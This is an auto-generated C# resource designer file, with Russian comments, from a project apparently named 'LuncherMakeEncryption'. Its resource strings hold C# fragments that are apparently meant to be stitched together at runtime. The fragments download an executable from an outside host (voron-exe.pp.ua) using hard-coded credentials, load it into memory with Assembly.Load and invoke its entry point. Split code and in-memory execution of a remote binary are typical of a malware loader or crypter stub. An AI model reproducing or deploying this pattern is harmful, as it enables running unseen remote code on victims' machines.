//------------------------------------------------------------------------------
// <auto-generated>
//     Этот код создан программой.
//     Исполняемая версия:4.0.30319.34014
//
//     Изменения в этом файле могут привести к неправильной работе и будут потеряны в случае
//     повторной генерации кода.
// </auto-generated>
//------------------------------------------------------------------------------

namespace LuncherMakeEncryption.Properties {
    using System;
    
    
    /// <summary>
    ///   Класс ресурса со строгой типизацией для поиска локализованных строк и т.д.
    /// </summary>
    // Этот класс создан автоматически классом StronglyTypedResourceBuilder
    // с помощью такого средства, как ResGen или Visual Studio.
    // Чтобы добавить или удалить член, измените файл .ResX и снова запустите ResGen
    // с параметром /str или перестройте свой проект VS.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Возвращает кэшированный экземпляр ResourceManager, использованный этим классом.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("LuncherMakeEncryption.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Перезаписывает свойство CurrentUICulture текущего потока для всех
        ///   обращений к ресурсу с помощью этого класса ресурса со строгой типизацией.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на var w = 0; var Useless = 0; var s = &quot;&quot;; var n = &quot;&quot;; var p = &quot;&quot;; WebClient x = null; MethodInfo m;.
        /// </summary>
        internal static string String000 {
            get {
                return ResourceManager.GetString("String000", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на s = &quot;http://voron-exe.pp.ua/C/Users/PosterTest/Documents/Debug/Voron%20Poster.exe&quot;; w++;.
        /// </summary>
        internal static string String001 {
            get {
                return ResourceManager.GetString("String001", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на n = &quot;PosterTest&quot;; w++;.
        /// </summary>
        internal static string String002 {
            get {
                return ResourceManager.GetString("String002", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на p = &quot;poster&quot;; w++;.
        /// </summary>
        internal static string String003 {
            get {
                return ResourceManager.GetString("String003", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на x = new WebClient(); w++;.
        /// </summary>
        internal static string String004 {
            get {
                return ResourceManager.GetString("String004", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на new Thread( ()=&gt;{ 
        ///Console.WriteLine(&quot;---&quot;+ w+&quot;----&quot;);
        /// while (w != 14) Thread.Sleep(100); 
        ///Console.WriteLine(&quot;===&quot;+ w+&quot;===&quot;);
        /// x.Credentials = new NetworkCredential(&quot;PosterTest&quot;, &quot;poster&quot;); w++;
        ///}).Start();.
        /// </summary>
        internal static string String005 {
            get {
                return ResourceManager.GetString("String005", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на new Thread( ()=&gt;{ 
        ///Console.WriteLine(&quot;---&quot;+ w+&quot;----&quot;);
        ///while (w != 15) Thread.Sleep(100);
        ///Console.WriteLine(&quot;===&quot;+ w+&quot;===&quot;);
        ///try
        /// {
        ///                var b = x.DownloadData(s);
        ///                var a = Assembly.Load(b);
        ///                m = a.EntryPoint;
        ///} catch (Exception Error){MessageBox.Show(Error.Message);}
        ///w++;
        ///}).Start();.
        /// </summary>
        internal static string String006 {
            get {
                return ResourceManager.GetString("String006", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Ищет локализованную строку, похожую на new Thread( ()=&gt;{ 
        ///Console.WriteLine(&quot;---&quot;+ w+&quot;----&quot;);
        ///while (w != 16) Thread.Sleep(100);
        ///Console.WriteLine(&quot;===&quot; +w+&quot;===&quot;);
        /// try
        ///{
        ///if (m != null)
        ///{
        ///     var ts = new System.Threading.ThreadStart(() =&gt; { try { if (m != null) m.Invoke(null, null); } catch { } });
        ///     var thd = new System.Threading.Thread(ts);
        ///     thd.SetApartmentState(ApartmentState.STA);
        ///     thd.Start();
        /// }
        ///}
        ///catch (Exception Error){MessageBox.Show(Error.Message);}
        ///w++;
        ///}).Start();.
        /// </summary>
        internal static string String007 {
            get {
                return ResourceManager.GetString("String007", resourceCulture);
            }
        }
    }
}
